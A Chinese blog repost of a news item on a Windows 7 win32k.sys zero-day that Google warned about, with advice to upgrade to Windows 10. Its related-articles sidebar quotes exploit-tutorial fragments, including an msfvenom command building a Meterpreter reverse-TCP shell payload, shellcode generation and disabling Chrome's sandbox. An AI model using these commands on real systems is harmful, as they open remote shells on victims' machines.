避免 Win 7 0day 漏洞,谷歌建议升级 Win 10

最新推荐文章于 2024-05-09 17:34:39 发布
最新推荐文章于 2024-05-09 17:34:39 发布
阅读量54 收藏
点赞数
文章标签: 操作系统

开发四年只会写业务代码,分布式高并发都不会还做程序员?  hot3.png

谷歌警告 Windows 7 的用户正面临着用于提权的 0day 漏洞,目前没有可用的补丁修复这一漏洞,谷歌建议用户升级至 Windows 10。

在微软的补丁开发推出前,Windows 7 用户会处于暴露状态。相关谷歌安全人员表示,这一漏洞是 Windows 系统的一个严重漏洞,在针对性攻击中被积极利用。作为 Windows win32k.sys 内核驱动程序中的本地权限升级,漏洞可以用作安全沙箱转移。

070225_7PU0_4062684.jpg

据该人员描述,新版本的 Windows 已经添加了应对漏洞的预防措施,这一漏洞仅对 Windows 7 32 位操作系统产生影响。

微软在收到漏洞反馈后,表示已经在进行该问题的修复。不过在正式的补丁出来前,这个漏洞仍可通过和浏览器的结合,躲过安全沙箱。

对此,该谷歌安全人员表示,如果用户仍在运行较旧版本的 Windows,应考虑升级到最新的系统 Windows 10。在该漏洞相关的 Windows 补丁可用的时候,用户也应及时在 Windows 7 上予以安装。

Windows 7 于2009年推出,预计将于2020年1月结束支持。因此,家庭用户和企业现在都被敦促升级到 Windows 10,以继续接收安全更新。

weixin_34396902
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
最新IE 0day漏洞Metasploit生成方法.txt
03-18
最新IE 0day漏洞Metasploit生成方法.txt
[ 攻防演练演示篇 ] 利用谷歌 0day 漏洞上线靶机
qq_51577576的博客
01-17 940
[ 攻防演练演示篇 ] 利用谷歌 0day 漏洞上线靶机 本次使用于搭建一个演示环境,用于演示,这里我利用了一个Google的0ady
Google 0day远程命令执行漏洞复现
星落的博客
04-15 649
目录 漏洞介绍 影响版本 漏洞复现 解决方案 漏洞介绍 国外安全研究员发布了 Google Chrome 浏览器远程代码执行 0Day 漏洞的 PoC,攻击者可以利用漏洞构造特制的页面,用户访问该页面会造成远程代码执行,漏洞影响 Chrome 最新正式版(89.0.4389.114)以及所有低版本。 影响版本 < = 89.0.4389.114 ​​​​​​​漏洞复现 1.使用对应版本的google浏览器,一定要用64位的特定版本。否则无法弹出计算器。 版本号:88.0.43.
xp谷歌浏览器时间快了_Win7系统零日漏洞曝光,谷歌建议升级Windows 10
weixin_39624700的博客
11-18 211
文章来源:IT之家原文链接:https://www.ithome.com/0/413/330.htmIT之家3月9日消息 谷歌先前发现了两个零日漏洞,其中的一个会对Chrome浏览器用户产生影响,可以通过更新新版浏览器得到解决。但是,另一个漏洞影响到了操作系统,就不是那么好解决的了。图片来源于网络根据谷歌安全研究员的说法,这一漏洞Windows win32k.sys内核驱动程序中的本地...
win11 即将来临 —— 你真的会管理你的Windows 10吗?
孙不坚1208
06-24 3355
你真的会管理你的Windows 10吗? 第一篇:经历Win10的自动更新,就像经历一场生死。 其实当你看到这个致命的圈圈开始转的时候,就已然没有了苟延残喘的机会。 本篇文章主要讨论以下两个问题 1.你真的了解Windows 10自动更新的意义吗? 2.如何关闭Windows 10的自动更新? 一、你真的了解Windows 10的自动更新的意义吗? 当说到Windows10自动更新的好处,我陷入了沉思… 当我打开百度 打开谷歌 打开知乎 打开脑子 晴晴:让没有更新系统习惯的人都能用上最新的系统。 铭铭:可
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-21 2277
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
Google Chrome 0day 远程代码执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-18 661
1.环境win10win7均可 2.关闭沙箱模式-no-sandbox 3.chrome客户端需64位(Google Chrome < = 89.0.4389.114) 使用命令关闭沙箱模式chrome.exe --no-sandbox Poc:https://github.com/r4j0x00/exploits/tree/master/chrome-0day msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.72.12
Chrome浏览器代码执行0day漏洞
NicolasZQ的博客
12-14 3423
适用版本: 漏洞危害:远程代码执行 影响版本:Chrome 89.0.4389.114以下(含89.0.4389.114) 测试版本: 86.0.4240.198 教程内容: 一、利用kali生成shellcode代码 比如说我要弹出计算器,那么: 64位操作系统: msfvenom -a x64 -p windows/x64/exec CMD="calc" EXITFUNC=thread -f num 32位操作系统: msfvenom -a x86 -p windows/exec CMD=
我偶然发现一个严重 0day,影响 Win7 和 Server 2008 R2,微软未发补丁(详情)
smellycat000的专栏
11-26 615
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队法国安全研究员 Clément Labro在更新一款 Windows 安全工具时,偶然发现一个影响 Windows 7 和 ...
winserver2008/iis7缓冲区溢出提权0day
09-13
一个很NB的工具。适用于iis7/iis7.5。溢出提权。 webshell提权、本地提权居家、放火必备。
谷歌0day POC.txt 攻防演练篇 谷歌0day漏洞
01-11
谷歌0day POC.txt 攻防演练篇 谷歌0day漏洞 可以去看我的文章 [ 攻防演练演示篇 ] 利用google0day上线
揭秘家用路由器0day漏洞挖掘技术
08-14
全球第一本关于家用路由器底层安全分析的书籍!系统剖析路由器硬件分析之道。技术要点与实践可延伸到智能物联、工控系统等新兴领域!吴石、余弦推荐!
核弹级漏洞通告 _ Spring RCE 0day漏洞_0day安全
09-22
继2021年底由阿里发现的Log4j的严重漏洞之后, Spring框架也被发现了一个重大的安全漏洞。目前这个漏洞的名称被称为“SpringShell: Spring Core RCE 0-day Vulnerability”
【12575嵌入式系统】嵌入式系统考前复习题终结版期末复习自考复习
嵌入式行业打工人,不定期更新博客。
05-05 548
答:1)小端存储器组织是较高的有效字节存放在较高的存储器地址,较低的有效。嵌入式系统是以应用为中心,以计算机技术为基础,软件硬件可裁剪,适应应用系。答:寻址方式是根据指令中给出的地址码字段来实现寻找真实操作数地址的方式。器产生一个具有一定时间宽度的复位信号,迫使系统复位,恢复系统正常运行。答:通用操作系统是一种通用的操作系统,可运行在不同的。答:当系统程序出现功能错乱,引起系统程序死循环时,能。存放在较低的存储器地址,较低的有效字节存放在较高的。正常运行,恢复系统程序的正常运行。
Linux软件安装
qq_65463941的博客
05-02 710
在Linux中编译安装软件通常需要执行以下几个步骤:下载源代码包可以从软件的官网、github等网下载解压源代码包进入软件包源代码目录在解压后得到的目录中,通常会有一个README文件、INSTALL、SETUP文件,其中描述了如何编译和安装软件执行configure脚本大多数软件包都包含了一个configure脚本,用于检测系统环境,并生成Makefile文件,Makefile文件包含了编译和安装软件所需的所有信息,执行./configure命令即可执行make命令。
Linux命令--查找占磁盘空间最大的文件
IT利刃出鞘的博客
05-03 274
本文介绍Linux怎样查找占硬盘空间最大的文件。
Linux系统入侵排查(二)
最新发布
weixin_72543266的博客
05-09 547
Linux系统入侵排查(二)对我处在学生时期的我来说,目前web渗透还是为主,但是还是需要对于蓝队相关的应急响应,等保测评等还是需要有一定的了解的,攻防兼备才能越站越勇嘛,linux入侵排查也能够让我更加熟悉liunx命令,本篇博文紧接上一篇博文开始进行.
<网络安全>《74 微课堂<容器是什么?>》
Else 的博客
05-05 485
容器,是一种虚拟化技术。允许一个操作系统上用户空间被分割成几个独立的单元在内核中运行,彼此互不干扰,这样一个独立的空间,就被称之为一个容器。
揭秘家用路由器0day漏洞挖掘技术 pdf
06-21
《揭秘家用路由器0day漏洞挖掘技术》是一本讲解家用路由器漏洞挖掘的技术书籍。这本书主要讲述了路由器漏洞的挖掘原理、方法和步骤,以及如何利用漏洞获取系统的管理员权限。 书中首先介绍了家用路由器的基本原理和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值